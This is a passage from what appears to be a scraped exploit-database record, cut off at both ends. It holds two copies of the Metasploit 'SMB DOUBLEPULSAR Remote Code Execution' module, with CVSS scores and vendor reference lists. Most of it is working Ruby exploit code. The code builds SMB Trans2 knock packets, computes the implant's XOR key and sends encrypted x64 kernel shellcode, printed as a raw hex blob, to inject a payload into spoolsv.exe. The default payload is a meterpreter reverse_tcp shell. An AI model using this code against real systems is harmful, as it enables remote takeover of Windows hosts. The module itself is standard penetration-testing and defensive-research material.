fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-23] #"}, "lastseen": "2021-09-22T22:14:58", "differentElements": ["sourceData"], "edition": 22}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "e0a5a559c8bc693711ca445932038bbc", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-24T00:15:39", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-27752"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:42030"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0147"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96705", "SMNTC-96709", "SMNTC-96704", "SMNTC-96707", "SMNTC-96703"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-24T00:15:39", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-24T00:15:39", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n 